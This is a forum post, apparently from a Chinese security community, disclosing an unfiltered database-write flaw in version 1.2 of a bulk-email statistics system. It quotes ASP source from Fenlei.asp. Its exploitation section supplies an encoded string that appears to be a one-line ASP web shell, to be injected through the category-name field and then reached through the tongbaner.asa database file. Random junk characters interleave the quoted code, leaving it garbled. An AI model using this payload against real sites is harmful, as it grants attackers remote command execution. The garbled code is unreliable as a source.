找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1986|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
'Fenlei.asp : N4 ?! M9 `: M

5 b/ H) I/ l# SIF Request.QueryString("Action")="del" Then 4 T5 i7 I$ y* @7 J- e
ID=Request.QueryString("ID") 7 H0 l2 ^$ L  m. H+ m
IF Countss ("tui","Fenlei",ID )<>0 then 9 o  c8 F( `( y& u) g
'略
1 H6 {$ L% ?. C& k9 SIF Request.QueryString("Action")="Add" Then
1 \4 \: @2 y4 @+ ~- z& i, v  [+ A- VTname=Request.Form("Typename")
, t- F2 F6 _' BSet Rs=Server.CreateObject("adodb.Recordset") 4 H5 Z9 Q! Y+ S; S* r8 F
Sql="Select * From Fenlei Order by id Desc "
7 [6 Q+ Q3 A! C6 J$ H5 D+ PRs.Open Sql,Conn,1,3 + d1 M3 d- J! F) c4 p; V3 |/ Q
Rs.Addnew 3 j: X: a2 i  p: n* p4 T: i
Rs("Typename")=Tname
5 Q' i8 i( ?/ v) {5 R'略
$ R6 i+ S+ z  L/ _  _1 s6 p* A  O3 V6 VSet Rs=Server.CreateObject("adodb.Recordset") 9 A/ e+ o' {3 g/ Q" C  @7 l
Sql="Select * From Fenlei Order by id Desc "
6 ]6 n* W4 f1 U9 y& TRs.Open Sql,Conn,1,1
, `' s/ Y% D$ h0 p# M'略
7 Z- \# y  [" {, a4 g1 K0 G2 v%>
6 P  P$ }9 k9 {* l, w# _ : i& \- T+ \* A( K" ]

( @0 l7 n; F5 o$ E6 H
% B+ {! g" [# F% m) D+ g没有过滤,直接写入数据库。# t2 E3 u* {2 p$ ?( a* a

0 m" @( E9 ~4 X* f$ z6 ]- B# L利用方法:( S3 x( t( K7 P; k) b

+ A$ t1 C. ]5 K0 c' Y* C( c2 k$ _' e; N插入:┼攠數畣整爠煥敵瑳∨≡┩>
: d& y% b2 u! O/ k 2 \; I6 L# g; h; d" c2 Q$ r. u

4 N9 R3 d- A. ~& x连接: http://www.xxx.com/###tongbaner.asa - C, h( H  [. z1 J
'默认安装文件: ; S5 F; Q" u  N. X
'install.asp: v3 j5 ~* Y3 v+ Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表